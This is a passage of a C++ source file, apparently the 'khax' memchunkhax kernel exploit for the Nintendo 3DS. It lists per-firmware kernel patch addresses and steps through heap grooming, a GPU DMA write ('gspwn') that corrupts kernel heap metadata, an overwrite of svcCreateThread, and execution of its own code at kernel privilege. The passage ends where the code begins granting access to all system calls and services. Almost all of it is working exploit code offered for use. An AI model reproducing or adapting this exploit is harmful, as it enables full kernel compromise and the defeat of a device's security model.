1141 lines
38 KiB
C++
1141 lines
38 KiB
C++
#include <3ds.h>
|
|
#include <cstddef>
|
|
#include <cstdint>
|
|
#include <cstdio>
|
|
#include <cstdlib>
|
|
#include <cstring>
|
|
#include <limits>
|
|
#include <new>
|
|
|
|
#include "khax.h"
|
|
#include "khaxinternal.h"
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
namespace KHAX
|
|
{
|
|
//------------------------------------------------------------------------------------------------
|
|
// Kernel and hardware version information.
|
|
struct VersionData
|
|
{
|
|
// New 3DS?
|
|
bool m_new3DS;
|
|
// Kernel version number
|
|
u32 m_kernelVersion;
|
|
// Nominal version number lower bound (for informational purposes only)
|
|
u32 m_nominalVersion;
|
|
// Patch location in svcCreateThread
|
|
u32 m_threadPatchAddress;
|
|
// Original version of code at m_threadPatchAddress
|
|
static constexpr const u32 m_threadPatchOriginalCode = 0x8DD00CE5;
|
|
// System call unlock patch location
|
|
u32 m_syscallPatchAddress;
|
|
// Kernel virtual address mapping of FCRAM
|
|
u32 m_fcramVirtualAddress;
|
|
// Physical mapping of FCRAM on this machine
|
|
static constexpr const u32 m_fcramPhysicalAddress = 0x20000000;
|
|
// Physical size of FCRAM on this machine
|
|
u32 m_fcramSize;
|
|
// Address of KThread address in kernel (KThread **)
|
|
static constexpr KThread **const m_currentKThreadPtr = reinterpret_cast<KThread **>(0xFFFF9000);
|
|
// Address of KProcess address in kernel (KProcess **)
|
|
static constexpr void **const m_currentKProcessPtr = reinterpret_cast<void **>(0xFFFF9004);
|
|
// Pseudo-handle of the current KProcess.
|
|
static constexpr const Handle m_currentKProcessHandle = 0xFFFF8001;
|
|
// Returned pointers within a KProcess object. This abstracts out which particular
|
|
// version of the KProcess object is in use.
|
|
struct KProcessPointers
|
|
{
|
|
KSVCACL *m_svcAccessControl;
|
|
u32 *m_kernelFlags;
|
|
u32 *m_processID;
|
|
};
|
|
// Creates a KProcessPointers for this kernel version and pointer to the object.
|
|
KProcessPointers(*m_makeKProcessPointers)(void *kprocess);
|
|
|
|
// Convert a user-mode virtual address in the linear heap into a kernel-mode virtual
|
|
// address using the version-specific information in this table entry.
|
|
void *ConvertLinearUserVAToKernelVA(void *address) const;
|
|
|
|
// Retrieve a VersionData for this kernel, or null if not recognized.
|
|
static const VersionData *GetForCurrentSystem();
|
|
|
|
private:
|
|
// Implementation behind m_makeKProcessPointers.
|
|
template <typename KProcessType>
|
|
static KProcessPointers MakeKProcessPointers(void *kprocess);
|
|
|
|
// Table of these.
|
|
static const VersionData s_versionTable[];
|
|
};
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// ARM11 kernel hack class.
|
|
class MemChunkHax
|
|
{
|
|
public:
|
|
// Construct using the version information for the current system.
|
|
MemChunkHax(const VersionData *versionData)
|
|
: m_versionData(versionData),
|
|
m_nextStep(1),
|
|
m_corrupted(0),
|
|
m_overwriteMemory(nullptr),
|
|
m_overwriteAllocated(0),
|
|
m_extraLinear(nullptr)
|
|
{
|
|
s_instance = this;
|
|
}
|
|
|
|
// Free memory and such.
|
|
~MemChunkHax();
|
|
|
|
// Umm, don't copy this class.
|
|
MemChunkHax(const MemChunkHax &) = delete;
|
|
MemChunkHax &operator =(const MemChunkHax &) = delete;
|
|
|
|
// Basic initialization.
|
|
Result Step1_Initialize();
|
|
// Allocate linear memory for the memchunkhax operation.
|
|
Result Step2_AllocateMemory();
|
|
// Free the second and fourth pages of the five.
|
|
Result Step3_SurroundFree();
|
|
// Verify that the freed heap blocks' data matches our expected layout.
|
|
Result Step4_VerifyExpectedLayout();
|
|
// Corrupt svcCreateThread in the ARM11 kernel and create the foothold.
|
|
Result Step5_CorruptCreateThread();
|
|
// Execute svcCreateThread to execute code at SVC privilege.
|
|
Result Step6_ExecuteSVCCode();
|
|
// Grant access to all services.
|
|
Result Step7_GrantServiceAccess();
|
|
|
|
private:
|
|
// SVC-mode entry point thunk (true entry point).
|
|
static Result Step6a_SVCEntryPointThunk();
|
|
// SVC-mode entry point.
|
|
Result Step6b_SVCEntryPoint();
|
|
// Undo the code patch that Step5_CorruptCreateThread did.
|
|
Result Step6c_UndoCreateThreadPatch();
|
|
// Fix the heap corruption caused as a side effect of step 5.
|
|
Result Step6d_FixHeapCorruption();
|
|
// Grant our process access to all system calls, including svcBackdoor.
|
|
Result Step6e_GrantSVCAccess();
|
|
// Patch the process ID to 0. Runs as svcBackdoor.
|
|
static Result Step7a_PatchPID();
|
|
// Restore the original PID. Runs as svcBackdoor.
|
|
static Result Step7b_UnpatchPID();
|
|
|
|
// Helper for dumping memory to SD card.
|
|
template <std::size_t S>
|
|
bool DumpMemberToSDCard(const unsigned char (MemChunkHax::*member)[S], const char *filename) const;
|
|
|
|
// Result returned by hacked svcCreateThread upon success.
|
|
static constexpr const Result STEP6_SUCCESS_RESULT = 0x1337C0DE;
|
|
|
|
// Version information.
|
|
const VersionData *const m_versionData;
|
|
// Next step number.
|
|
int m_nextStep;
|
|
// Whether we are in a corrupted state, meaning we cannot continue if an error occurs.
|
|
int m_corrupted;
|
|
|
|
// Free block structure in the kernel, the one used in the memchunkhax exploit.
|
|
struct HeapFreeBlock
|
|
{
|
|
int m_count;
|
|
HeapFreeBlock *m_next;
|
|
HeapFreeBlock *m_prev;
|
|
int m_unknown1;
|
|
int m_unknown2;
|
|
};
|
|
|
|
// The layout of a memory page.
|
|
union Page
|
|
{
|
|
unsigned char m_bytes[4096];
|
|
HeapFreeBlock m_freeBlock;
|
|
};
|
|
|
|
// The linear memory allocated for the memchunkhax overwrite.
|
|
struct OverwriteMemory
|
|
{
|
|
union
|
|
{
|
|
unsigned char m_bytes[6 * 4096];
|
|
Page m_pages[6];
|
|
};
|
|
};
|
|
OverwriteMemory *m_overwriteMemory;
|
|
unsigned m_overwriteAllocated;
|
|
|
|
// Additional linear memory buffer for temporary purposes.
|
|
union ExtraLinearMemory
|
|
{
|
|
ALIGN(64) unsigned char m_bytes[64];
|
|
// When interpreting as a HeapFreeBlock.
|
|
HeapFreeBlock m_freeBlock;
|
|
};
|
|
// Must be a multiple of 16 for use with gspwn.
|
|
static_assert(sizeof(ExtraLinearMemory) % 16 == 0, "ExtraLinearMemory isn't a multiple of 16 bytes");
|
|
ExtraLinearMemory *m_extraLinear;
|
|
|
|
// Copy of the old ACL
|
|
KSVCACL m_oldACL;
|
|
|
|
// Original process ID.
|
|
u32 m_originalPID;
|
|
|
|
// Buffers for dumped data when debugging.
|
|
#ifdef KHAX_DEBUG_DUMP_DATA
|
|
unsigned char m_savedKProcess[sizeof(KProcess_8_0_0_New)];
|
|
unsigned char m_savedKThread[sizeof(KThread)];
|
|
unsigned char m_savedThreadSVC[0x100];
|
|
#endif
|
|
|
|
// Pointer to our instance.
|
|
static MemChunkHax *volatile s_instance;
|
|
};
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Make an error code
|
|
inline Result MakeError(Result level, Result summary, Result module, Result error);
|
|
enum : Result { KHAX_MODULE = 254 };
|
|
// Check whether this system is a New 3DS.
|
|
Result IsNew3DS(bool *answer, u32 kernelVersionAlreadyKnown = 0);
|
|
// gspwn, meant for reading from or writing to freed buffers.
|
|
Result GSPwn(void *dest, const void *src, std::size_t size, bool wait = true);
|
|
|
|
static Result userFlushDataCache(const void *p, std::size_t n);
|
|
static Result userInvalidateDataCache(const void *p, std::size_t n);
|
|
static void userFlushPrefetch();
|
|
static void userDsb();
|
|
static void userDmb();
|
|
static void kernelCleanDataCacheLineWithMva(const void *p);
|
|
static void kernelInvalidateInstructionCacheLineWithMva(const void *p);
|
|
|
|
// Given a pointer to a structure that is a member of another structure,
|
|
// return a pointer to the outer structure. Inspired by Windows macro.
|
|
template <typename Outer, typename Inner>
|
|
Outer *ContainingRecord(Inner *member, Inner Outer::*field);
|
|
}
|
|
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
//
|
|
// Class VersionData
|
|
//
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Creates a KProcessPointers for this kernel version and pointer to the object.
|
|
template <typename KProcessType>
|
|
KHAX::VersionData::KProcessPointers KHAX::VersionData::MakeKProcessPointers(void *kprocess)
|
|
{
|
|
KProcessType *kproc = static_cast<KProcessType *>(kprocess);
|
|
|
|
KProcessPointers result;
|
|
result.m_svcAccessControl = &kproc->m_svcAccessControl;
|
|
result.m_processID = &kproc->m_processID;
|
|
result.m_kernelFlags = &kproc->m_kernelFlags;
|
|
return result;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// System version table
|
|
const KHAX::VersionData KHAX::VersionData::s_versionTable[] =
|
|
{
|
|
#define KPROC_FUNC(ver) MakeKProcessPointers<KProcess_##ver>
|
|
|
|
// Old 3DS, old address layout
|
|
{ false, SYSTEM_VERSION(2, 34, 0), SYSTEM_VERSION(4, 1, 0), 0xEFF83C9F, 0xEFF827CC, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
|
|
{ false, SYSTEM_VERSION(2, 35, 6), SYSTEM_VERSION(5, 0, 0), 0xEFF83737, 0xEFF822A8, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
|
|
{ false, SYSTEM_VERSION(2, 36, 0), SYSTEM_VERSION(5, 1, 0), 0xEFF83733, 0xEFF822A4, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
|
|
{ false, SYSTEM_VERSION(2, 37, 0), SYSTEM_VERSION(6, 0, 0), 0xEFF83733, 0xEFF822A4, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
|
|
{ false, SYSTEM_VERSION(2, 38, 0), SYSTEM_VERSION(6, 1, 0), 0xEFF83733, 0xEFF822A4, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
|
|
{ false, SYSTEM_VERSION(2, 39, 4), SYSTEM_VERSION(7, 0, 0), 0xEFF83737, 0xEFF822A8, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
|
|
{ false, SYSTEM_VERSION(2, 40, 0), SYSTEM_VERSION(7, 2, 0), 0xEFF83733, 0xEFF822A4, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
|
|
// Old 3DS, new address layout
|
|
{ false, SYSTEM_VERSION(2, 44, 6), SYSTEM_VERSION(8, 0, 0), 0xDFF8376F, 0xDFF82294, 0xE0000000, 0x08000000, KPROC_FUNC(8_0_0_Old) },
|
|
{ false, SYSTEM_VERSION(2, 46, 0), SYSTEM_VERSION(9, 0, 0), 0xDFF8383F, 0xDFF82290, 0xE0000000, 0x08000000, KPROC_FUNC(8_0_0_Old) },
|
|
// New 3DS
|
|
{ true, SYSTEM_VERSION(2, 45, 5), SYSTEM_VERSION(8, 1, 0), 0xDFF83757, 0xDFF82264, 0xE0000000, 0x10000000, KPROC_FUNC(8_0_0_New) }, // untested
|
|
{ true, SYSTEM_VERSION(2, 46, 0), SYSTEM_VERSION(9, 0, 0), 0xDFF83837, 0xDFF82260, 0xE0000000, 0x10000000, KPROC_FUNC(8_0_0_New) },
|
|
|
|
#undef KPROC_FUNC
|
|
};
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Convert a user-mode virtual address in the linear heap into a kernel-mode virtual
|
|
// address using the version-specific information in this table entry.
|
|
void *KHAX::VersionData::ConvertLinearUserVAToKernelVA(void *address) const
|
|
{
|
|
static_assert((std::numeric_limits<std::uintptr_t>::max)() == (std::numeric_limits<u32>::max)(),
|
|
"you're sure that this is a 3DS?");
|
|
|
|
// Convert the address to a physical address, since that's how we know the mapping.
|
|
u32 physical = osConvertVirtToPhys(address);
|
|
if (physical == 0)
|
|
{
|
|
return nullptr;
|
|
}
|
|
|
|
// Verify that the address is within FCRAM.
|
|
if ((physical < m_fcramPhysicalAddress) || (physical - m_fcramPhysicalAddress >= m_fcramSize))
|
|
{
|
|
return nullptr;
|
|
}
|
|
|
|
// Now we can convert.
|
|
return reinterpret_cast<char *>(m_fcramVirtualAddress) + (physical - m_fcramPhysicalAddress);
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Retrieve a VersionData for this kernel, or null if not recognized.
|
|
const KHAX::VersionData *KHAX::VersionData::GetForCurrentSystem()
|
|
{
|
|
// Get kernel version for comparison.
|
|
u32 kernelVersion = osGetKernelVersion();
|
|
|
|
// Determine whether this is a New 3DS.
|
|
bool isNew3DS;
|
|
if (IsNew3DS(&isNew3DS, kernelVersion) != 0)
|
|
{
|
|
return nullptr;
|
|
}
|
|
|
|
// Search our list for a match.
|
|
for (const VersionData *entry = s_versionTable; entry < &s_versionTable[KHAX_lengthof(s_versionTable)]; ++entry)
|
|
{
|
|
// New 3DS flag must match.
|
|
if ((entry->m_new3DS && !isNew3DS) || (!entry->m_new3DS && isNew3DS))
|
|
{
|
|
continue;
|
|
}
|
|
// Kernel version must match.
|
|
if (entry->m_kernelVersion != kernelVersion)
|
|
{
|
|
continue;
|
|
}
|
|
|
|
return entry;
|
|
}
|
|
|
|
return nullptr;
|
|
}
|
|
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
//
|
|
// Class MemChunkHax
|
|
//
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
KHAX::MemChunkHax *volatile KHAX::MemChunkHax::s_instance = nullptr;
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Basic initialization.
|
|
Result KHAX::MemChunkHax::Step1_Initialize()
|
|
{
|
|
if (m_nextStep != 1)
|
|
{
|
|
KHAX_printf("MemChunkHax: Invalid step number %d for Step1_Initialize\n", m_nextStep);
|
|
return MakeError(28, 5, KHAX_MODULE, 1016);
|
|
}
|
|
|
|
// Nothing to do in current implementation.
|
|
++m_nextStep;
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Allocate linear memory for the memchunkhax operation.
|
|
Result KHAX::MemChunkHax::Step2_AllocateMemory()
|
|
{
|
|
if (m_nextStep != 2)
|
|
{
|
|
KHAX_printf("MemChunkHax: Invalid step number %d for Step2_AllocateMemory\n", m_nextStep);
|
|
return MakeError(28, 5, KHAX_MODULE, 1016);
|
|
}
|
|
|
|
// Allocate the linear memory for the overwrite process.
|
|
u32 address = 0xFFFFFFFF;
|
|
Result result = svcControlMemory(&address, 0, 0, sizeof(OverwriteMemory), MEMOP_ALLOC_LINEAR,
|
|
static_cast<MemPerm>(MEMPERM_READ | MEMPERM_WRITE));
|
|
|
|
KHAX_printf("Step2:res=%08lx addr=%08lx\n", result, address);
|
|
|
|
if (result != 0)
|
|
{
|
|
return result;
|
|
}
|
|
|
|
m_overwriteMemory = reinterpret_cast<OverwriteMemory *>(address);
|
|
m_overwriteAllocated = (1u << 6) - 1; // all 6 pages allocated now
|
|
|
|
// Why didn't we get a page-aligned address?!
|
|
if (address & 0xFFF)
|
|
{
|
|
// Since we already assigned m_overwriteMemory, it'll get freed by our destructor.
|
|
KHAX_printf("Step2:misaligned memory\n");
|
|
return MakeError(26, 7, KHAX_MODULE, 1009);
|
|
}
|
|
|
|
// Allocate extra memory that we'll need.
|
|
m_extraLinear = static_cast<ExtraLinearMemory *>(linearMemAlign(sizeof(*m_extraLinear),
|
|
alignof(*m_extraLinear)));
|
|
if (!m_extraLinear)
|
|
{
|
|
KHAX_printf("Step2:failed extra alloc\n");
|
|
return MakeError(26, 3, KHAX_MODULE, 1011);
|
|
}
|
|
KHAX_printf("Step2:extra=%p\n", m_extraLinear);
|
|
|
|
// OK, we're good here.
|
|
++m_nextStep;
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Free the second and fourth pages of the five.
|
|
Result KHAX::MemChunkHax::Step3_SurroundFree()
|
|
{
|
|
if (m_nextStep != 3)
|
|
{
|
|
KHAX_printf("MemChunkHax: Invalid step number %d for Step3_AllocateMemory\n", m_nextStep);
|
|
return MakeError(28, 5, KHAX_MODULE, 1016);
|
|
}
|
|
|
|
// We do this because the exploit involves triggering a heap coalesce. We surround a heap
|
|
// block (page) with two freed pages, then free the middle page. By controlling both outside
|
|
// pages, we know their addresses, and can fix up the corrupted heap afterward.
|
|
//
|
|
// Here's what the heap will look like after step 3:
|
|
//
|
|
// ___XX-X-X___
|
|
//
|
|
// _ = unknown (could be allocated and owned by other code)
|
|
// X = allocated
|
|
// - = allocated then freed by us
|
|
//
|
|
// In step 4, we will free the second page:
|
|
//
|
|
// ___X--X-X___
|
|
//
|
|
// Heap coalescing will trigger due to two adjacent free blocks existing. The fifth page's
|
|
// "previous" pointer will be set to point to the second page rather than the third. We will
|
|
// use gspwn to make that overwrite kernel code instead.
|
|
//
|
|
// We have 6 pages to ensure that we have surrounding allocated pages, giving us a little
|
|
// sandbox to play in. In particular, we can use this design to determine the address of the
|
|
// next block--by controlling the location of the next block.
|
|
u32 dummy;
|
|
|
|
// Free the third page.
|
|
if (Result result = svcControlMemory(&dummy, reinterpret_cast<u32>(&m_overwriteMemory->m_pages[2]), 0,
|
|
sizeof(m_overwriteMemory->m_pages[2]), MEMOP_FREE, static_cast<MemPerm>(0)))
|
|
{
|
|
KHAX_printf("Step3:svcCM1 failed:%08lx\n", result);
|
|
return result;
|
|
}
|
|
m_overwriteAllocated &= ~(1u << 2);
|
|
|
|
// Free the fifth page.
|
|
if (Result result = svcControlMemory(&dummy, reinterpret_cast<u32>(&m_overwriteMemory->m_pages[4]), 0,
|
|
sizeof(m_overwriteMemory->m_pages[4]), MEMOP_FREE, static_cast<MemPerm>(0)))
|
|
{
|
|
KHAX_printf("Step3:svcCM2 failed:%08lx\n", result);
|
|
return result;
|
|
}
|
|
m_overwriteAllocated &= ~(1u << 4);
|
|
|
|
// Attempt to write to remaining pages.
|
|
//KHAX_printf("Step2:probing page [0]\n");
|
|
*static_cast<volatile u8 *>(&m_overwriteMemory->m_pages[0].m_bytes[0]) = 0;
|
|
//KHAX_printf("Step2:probing page [1]\n");
|
|
*static_cast<volatile u8 *>(&m_overwriteMemory->m_pages[1].m_bytes[0]) = 0;
|
|
//KHAX_printf("Step2:probing page [3]\n");
|
|
*static_cast<volatile u8 *>(&m_overwriteMemory->m_pages[3].m_bytes[0]) = 0;
|
|
//KHAX_printf("Step2:probing page [5]\n");
|
|
*static_cast<volatile u8 *>(&m_overwriteMemory->m_pages[5].m_bytes[0]) = 0;
|
|
KHAX_printf("Step3:probing done\n");
|
|
|
|
// Done.
|
|
++m_nextStep;
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Verify that the freed heap blocks' data matches our expected layout.
|
|
Result KHAX::MemChunkHax::Step4_VerifyExpectedLayout()
|
|
{
|
|
if (m_nextStep != 4)
|
|
{
|
|
KHAX_printf("MemChunkHax: Invalid step number %d for Step4_VerifyExpectedLayout\n", m_nextStep);
|
|
return MakeError(28, 5, KHAX_MODULE, 1016);
|
|
}
|
|
|
|
// Copy the first freed page (third page) out to read its heap metadata.
|
|
userInvalidateDataCache(m_extraLinear, sizeof(*m_extraLinear));
|
|
userDmb();
|
|
|
|
if (Result result = GSPwn(m_extraLinear, &m_overwriteMemory->m_pages[2],
|
|
sizeof(*m_extraLinear)))
|
|
{
|
|
KHAX_printf("Step4:gspwn failed:%08lx\n", result);
|
|
return result;
|
|
}
|
|
|
|
// Debug information about the memory block
|
|
KHAX_printf("Step4:[2]u=%p k=%p\n", &m_overwriteMemory->m_pages[2], m_versionData->
|
|
ConvertLinearUserVAToKernelVA(&m_overwriteMemory->m_pages[2]));
|
|
KHAX_printf("Step4:[2]n=%p p=%p c=%d\n", m_extraLinear->m_freeBlock.m_next,
|
|
m_extraLinear->m_freeBlock.m_prev, m_extraLinear->m_freeBlock.m_count);
|
|
|
|
// The next page from the third should equal the fifth page.
|
|
if (m_extraLinear->m_freeBlock.m_next != m_versionData->ConvertLinearUserVAToKernelVA(
|
|
&m_overwriteMemory->m_pages[4]))
|
|
{
|
|
KHAX_printf("Step4:[2]->next != [4]\n");
|
|
KHAX_printf("Step4:%p %p %p\n", m_extraLinear->m_freeBlock.m_next,
|
|
m_versionData->ConvertLinearUserVAToKernelVA(&m_overwriteMemory->m_pages[4]),
|
|
&m_overwriteMemory->m_pages[4]);
|
|
return MakeError(26, 5, KHAX_MODULE, 1014);
|
|
}
|
|
|
|
// Copy the second freed page (fifth page) out to read its heap metadata.
|
|
userInvalidateDataCache(m_extraLinear, sizeof(*m_extraLinear));
|
|
userDmb();
|
|
|
|
if (Result result = GSPwn(m_extraLinear, &m_overwriteMemory->m_pages[4],
|
|
sizeof(*m_extraLinear)))
|
|
{
|
|
KHAX_printf("Step4:gspwn failed:%08lx\n", result);
|
|
return result;
|
|
}
|
|
|
|
KHAX_printf("Step4:[4]u=%p k=%p\n", &m_overwriteMemory->m_pages[4], m_versionData->
|
|
ConvertLinearUserVAToKernelVA(&m_overwriteMemory->m_pages[4]));
|
|
KHAX_printf("Step4:[4]n=%p p=%p c=%d\n", m_extraLinear->m_freeBlock.m_next,
|
|
m_extraLinear->m_freeBlock.m_prev, m_extraLinear->m_freeBlock.m_count);
|
|
|
|
// The previous page from the fifth should equal the third page.
|
|
if (m_extraLinear->m_freeBlock.m_prev != m_versionData->ConvertLinearUserVAToKernelVA(
|
|
&m_overwriteMemory->m_pages[2]))
|
|
{
|
|
KHAX_printf("Step4:[4]->prev != [2]\n");
|
|
KHAX_printf("Step4:%p %p %p\n", m_extraLinear->m_freeBlock.m_prev,
|
|
m_versionData->ConvertLinearUserVAToKernelVA(&m_overwriteMemory->m_pages[2]),
|
|
&m_overwriteMemory->m_pages[2]);
|
|
return MakeError(26, 5, KHAX_MODULE, 1014);
|
|
}
|
|
|
|
// Validation successful
|
|
++m_nextStep;
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Corrupt svcCreateThread in the ARM11 kernel and create the foothold.
|
|
Result KHAX::MemChunkHax::Step5_CorruptCreateThread()
|
|
{
|
|
if (m_nextStep != 5)
|
|
{
|
|
KHAX_printf("MemChunkHax: Invalid step number %d for Step5_CorruptCreateThread\n", m_nextStep);
|
|
return MakeError(28, 5, KHAX_MODULE, 1016);
|
|
}
|
|
|
|
userInvalidateDataCache(m_extraLinear, sizeof(*m_extraLinear));
|
|
userDmb();
|
|
|
|
// Read the memory page we're going to gspwn.
|
|
if (Result result = GSPwn(m_extraLinear, &m_overwriteMemory->m_pages[2].m_freeBlock,
|
|
sizeof(*m_extraLinear)))
|
|
{
|
|
KHAX_printf("Step5:gspwn read failed:%08lx\n", result);
|
|
return result;
|
|
}
|
|
|
|
// Adjust the "next" pointer to point to within the svcCreateThread system call so as to
|
|
// corrupt certain instructions. The result will be that calling svcCreateThread will result
|
|
// in executing our code.
|
|
// NOTE: The overwrite is modifying the "m_prev" field, so we subtract the offset of m_prev.
|
|
// That is, the overwrite adds this offset back in.
|
|
m_extraLinear->m_freeBlock.m_next = reinterpret_cast<HeapFreeBlock *>(
|
|
m_versionData->m_threadPatchAddress - offsetof(HeapFreeBlock, m_prev));
|
|
|
|
userFlushDataCache(&m_extraLinear->m_freeBlock.m_next,
|
|
sizeof(m_extraLinear->m_freeBlock.m_next));
|
|
|
|
// Do the GSPwn, the actual exploit we've been waiting for.
|
|
if (Result result = GSPwn(&m_overwriteMemory->m_pages[2].m_freeBlock, m_extraLinear,
|
|
sizeof(*m_extraLinear)))
|
|
{
|
|
KHAX_printf("Step5:gspwn exploit failed:%08lx\n", result);
|
|
return result;
|
|
}
|
|
|
|
// The heap is now corrupted in two ways (Step6 explains why two ways).
|
|
m_corrupted += 2;
|
|
|
|
KHAX_printf("Step5:gspwn succeeded; heap now corrupt\n");
|
|
|
|
// Corrupt svcCreateThread by freeing the second page. The kernel will coalesce the third
|
|
// page into the second page, and in the process zap an instruction pair in svcCreateThread.
|
|
u32 dummy;
|
|
if (Result result = svcControlMemory(&dummy, reinterpret_cast<u32>(&m_overwriteMemory->m_pages[1]),
|
|
0, sizeof(m_overwriteMemory->m_pages[1]), MEMOP_FREE, static_cast<MemPerm>(0)))
|
|
{
|
|
KHAX_printf("Step5:free to pwn failed:%08lx\n", result);
|
|
return result;
|
|
}
|
|
m_overwriteAllocated &= ~(1u << 1);
|
|
|
|
userFlushPrefetch();
|
|
|
|
// We have an additional layer of instability because of the kernel code overwrite.
|
|
++m_corrupted;
|
|
|
|
KHAX_printf("Step5:svcCreateThread now hacked\n");
|
|
|
|
++m_nextStep;
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Execute svcCreateThread to execute code at SVC privilege.
|
|
Result KHAX::MemChunkHax::Step6_ExecuteSVCCode()
|
|
{
|
|
if (m_nextStep != 6)
|
|
{
|
|
KHAX_printf("MemChunkHax: Invalid step number %d for Step6_ExecuteSVCCode\n", m_nextStep);
|
|
return MakeError(28, 5, KHAX_MODULE, 1016);
|
|
}
|
|
|
|
// Call svcCreateThread such that r0 is the desired exploit function. Note that the
|
|
// parameters to the usual system call thunk are rearranged relative to the actual system call
|
|
// - the thread priority parameter is actually the one that goes into r0. In addition, we
|
|
// want to pass other parameters that make for an illegal thread creation request, because the
|
|
// rest of the thread creation SVC occurs before the hacked code gets executed. We want the
|
|
// thread creation request to fail, then the hack to grant us control. Processor ID
|
|
// 0x7FFFFFFF seems to do the trick here.
|
|
Handle dummyHandle;
|
|
Result result = svcCreateThread(&dummyHandle, nullptr, 0, nullptr, reinterpret_cast<s32>(
|
|
Step6a_SVCEntryPointThunk), (std::numeric_limits<s32>::max)());
|
|
|
|
KHAX_printf("Step6:SVC mode returned: %08lX %d\n", result, m_nextStep);
|
|
|
|
if (result != STEP6_SUCCESS_RESULT)
|
|
{
|
|
// If the result was 0, something actually went wrong.
|
|
if (result == 0)
|
|
{
|
|
result = MakeError(27, 11, KHAX_MODULE, 1023);
|
|
}
|
|
|
|
return result;
|
|
}
|
|
|
|
#ifdef KHAX_DEBUG
|
|
char oldACLString[KHAX_lengthof(m_oldACL) * 2 + 1];
|
|
char *sp = oldACLString;
|
|
for (unsigned char b : m_oldACL)
|
|
{
|
|
*sp++ = "0123456789abcdef"[b >> 4];
|
|
*sp++ = "0123456789abcdef"[b & 15];
|
|
}
|
|
*sp = '\0';
|
|
|
|
KHAX_printf("oldACL:%s\n", oldACLString);
|
|
#endif
|
|
|
|
++m_nextStep;
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// SVC-mode entry point thunk (true entry point).
|
|
#ifndef _MSC_VER
|
|
__attribute__((__naked__))
|
|
#endif
|
|
Result KHAX::MemChunkHax::Step6a_SVCEntryPointThunk()
|
|
{
|
|
__asm__ volatile("cpsid aif\n"
|
|
"add sp, sp, #8\n");
|
|
|
|
register Result result __asm__("r0") = s_instance->Step6b_SVCEntryPoint();
|
|
|
|
__asm__ volatile("ldr pc, [sp], #4" : : "r"(result));
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// SVC-mode entry point.
|
|
#ifndef _MSC_VER
|
|
__attribute__((__noinline__))
|
|
#endif
|
|
Result KHAX::MemChunkHax::Step6b_SVCEntryPoint()
|
|
{
|
|
if (Result result = Step6c_UndoCreateThreadPatch())
|
|
{
|
|
return result;
|
|
}
|
|
if (Result result = Step6d_FixHeapCorruption())
|
|
{
|
|
return result;
|
|
}
|
|
if (Result result = Step6e_GrantSVCAccess())
|
|
{
|
|
return result;
|
|
}
|
|
|
|
return STEP6_SUCCESS_RESULT;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Undo the code patch that Step5_CorruptCreateThread did.
|
|
Result KHAX::MemChunkHax::Step6c_UndoCreateThreadPatch()
|
|
{
|
|
// Unpatch svcCreateThread. NOTE: Misaligned pointer.
|
|
*reinterpret_cast<u32 *>(m_versionData->m_threadPatchAddress) = m_versionData->
|
|
m_threadPatchOriginalCode;
|
|
|
|
kernelCleanDataCacheLineWithMva(
|
|
reinterpret_cast<void *>(m_versionData->m_threadPatchAddress));
|
|
userDsb();
|
|
kernelInvalidateInstructionCacheLineWithMva(
|
|
reinterpret_cast<void *>(m_versionData->m_threadPatchAddress));
|
|
|
|
--m_corrupted;
|
|
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Fix the heap corruption caused as a side effect of step 5.
|
|
Result KHAX::MemChunkHax::Step6d_FixHeapCorruption()
|
|
{
|
|
// The kernel's heap coalesce code seems to be like the following for the case we triggered,
|
|
// where we're freeing a block before ("left") an adjacent block ("right"):
|
|
//
|
|
// (1) left->m_count += right->m_count;
|
|
// (2) left->m_next = right->m_next;
|
|
// (3) right->m_next->m_prev = left;
|
|
//
|
|
// (1) should have happened normally. (3) is what we exploit: we set right->m_next to point
|
|
// to where we want to patch, such that the write to m_prev is the desired code overwrite.
|
|
// (2) is copying the value we put into right->m_next to accomplish (3).
|
|
//
|
|
// As a result of these shenanigans, we have two fixes to do to the heap: fix left->m_next to
|
|
// point to the correct next free block, and do the write to right->m_next->m_prev that didn't
|
|
// happen because it instead was writing to kernel code.
|
|
|
|
// "left" is the second overwrite page.
|
|
auto left = static_cast<HeapFreeBlock *>(m_versionData->ConvertLinearUserVAToKernelVA(
|
|
&m_overwriteMemory->m_pages[1].m_freeBlock));
|
|
// "right->m_next" is the fifth overwrite page.
|
|
auto rightNext = static_cast<HeapFreeBlock *>(m_versionData->ConvertLinearUserVAToKernelVA(
|
|
&m_overwriteMemory->m_pages[4].m_freeBlock));
|
|
|
|
// Do the two fixups.
|
|
left->m_next = rightNext;
|
|
--m_corrupted;
|
|
|
|
rightNext->m_prev = left;
|
|
--m_corrupted;
|
|
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Grant our process access to all system calls, including svcBackdoor.
|
|
